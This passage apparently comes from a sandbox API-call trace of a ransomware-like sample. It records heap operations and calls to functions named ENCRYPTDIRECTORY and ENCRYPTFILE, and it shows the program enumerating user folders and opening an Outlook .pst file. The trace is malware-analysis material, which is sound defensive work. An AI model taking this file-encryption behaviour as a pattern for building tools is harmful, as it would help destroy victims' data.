lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0084.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0084.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0084.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0084.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0084.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0084.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0084.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0084.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0084.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0084.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0084.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0084.703] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0084.703] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0084.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0084.703] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0084.703] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Videos\\" (normalized: "c:\\users\\fd1hvy\\documents\\my videos")) returned 0x2416 [0084.704] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Videos\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x436859c, ftCreationTime.dwHighDateTime=0x4368594, ftLastAccessTime.dwLowDateTime=0xdf0cc8, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x144eaa0, nFileSizeHigh=0x779b2eea, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x43ca6a0, cFileName="", cAlternateFileName="мńဓ+\x10")) returned 0xffffffff [0084.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0084.704] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0084.704] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Videos\\" (normalized: "c:\\users\\fd1hvy\\documents\\my videos")) returned 0x2416 [0084.704] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Videos\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x436859c, ftCreationTime.dwHighDateTime=0x4368594, ftLastAccessTime.dwLowDateTime=0xdf0cc8, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x144eaa0, nFileSizeHigh=0x779b2eea, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x43ca760, cFileName="", cAlternateFileName="אּмńဓ+\x10")) returned 0xffffffff [0084.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0084.704] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0084.704] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0084.704] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files")) returned 0x10 [0084.705] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca640, cFileName=".", cAlternateFileName="")) returned 0x41ac500 [0084.705] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca640, cFileName="..", cAlternateFileName="")) returned 1 [0084.705] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x43ca640, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 1 [0084.851] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2330, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x12, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3570, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﴐмńဓ+\x10")) returned 0 [0084.852] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0084.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|kkcie@kdj.kd.pst", cchCount1=17, lpString2="", cchCount2=0) returned 3 [0084.852] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0084.852] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 0x41ac140 [0084.852] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0084.852] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0084.852] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0084.852] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0084.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0084.853] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0084.853] FreeLibrary (hLibModule=0x772d0000) returned 1 [0084.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0084.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0084.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0084.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0084.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0084.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0084.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a41d8 | out: hHeap=0x1780000) returned 1 [0084.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.854] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0084.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0084.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0084.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0084.855] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0084.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0084.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0084.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0084.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0084.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0084.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0084.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0084.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: 